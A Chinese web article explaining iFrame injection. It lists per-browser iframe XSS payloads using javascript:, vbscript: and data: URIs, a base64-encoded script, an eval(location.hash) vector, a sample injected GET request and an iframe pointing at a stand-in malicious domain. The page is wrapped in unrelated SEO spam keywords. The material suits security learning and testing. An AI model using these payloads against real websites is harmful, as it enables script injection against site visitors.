91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何解析iFrame注入時的利用

發布時間:2021-12-10 15:32:41 來源:億速云 閱讀:159 作者:柒染 欄目:大數據

本篇文章為大家展示了如何解析iFrame注入時的利用,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

iFrame注入是一種非常常見的跨站腳本攻擊。它包括已插入到網頁或文章內容的一個或多個iframe代碼,或一般下載一個可執行程序或進行其他動作使網站訪客的電腦妥協。在最好的情況下,谷歌可能會標注該網站“惡意”。最糟糕的情況是,站點所有者和訪問者最終使用了受惡意軟件感染的計算機。

iFrame注入發生在當一個脆弱的網頁上的iFrame通過一個用戶可控輸入顯示另一個網頁。

GET/search.jsp?query=%3Ciframe%20src=%22https://google.com/?%22%3E%3C/iframe%3E HTTP/1.1

如何解析iFrame注入時的利用

不同瀏覽器使用不同payload:

</iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)

如何解析iFrame注入時的利用

多種利用方式如下:

<iframe src="vbscript:msgbox(1)"></iframe> (IE)  <iframe src="javascript:alert(1)"></iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)http://target.com/something.jsp?query=<script>eval(location.hash.slice(1))</script>#alert(1)

接受用戶提供的數據作為iframe源URL可能會導致在Visualforce頁面中加載惡意內容。

發生iFrame欺騙漏洞在以下情況:

1、數據通過不可信的源進入web應用程序。

2、數據作為iframe URL使用,而不進行驗證。

通過這種方式,如果攻擊者向受害者提供設置為惡意網站的iframesrc參數,則該框架將與惡意網站的內容一起呈現。

<iframe src="http://evildomain.com/">

上述內容就是如何解析iFrame注入時的利用,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

昌邑市| 常州市| 江安县| 和田县| 高邮市| 定远县| 辽阳市| 离岛区| 南川市| 醴陵市| 奈曼旗| 遵化市| 天峨县| 黄骅市| 徐闻县| 乌苏市| 石城县| 同德县| 安国市| 新蔡县| 平安县| 三都| 岳西县| 济源市| 昭觉县| 黑水县| 乐都县| 高雄县| 凉山| 甘孜县| 鹤山市| 漳平市| 凤台县| 大庆市| 满洲里市| 友谊县| 屯留县| 长顺县| 卢湾区| 姚安县| 新民市|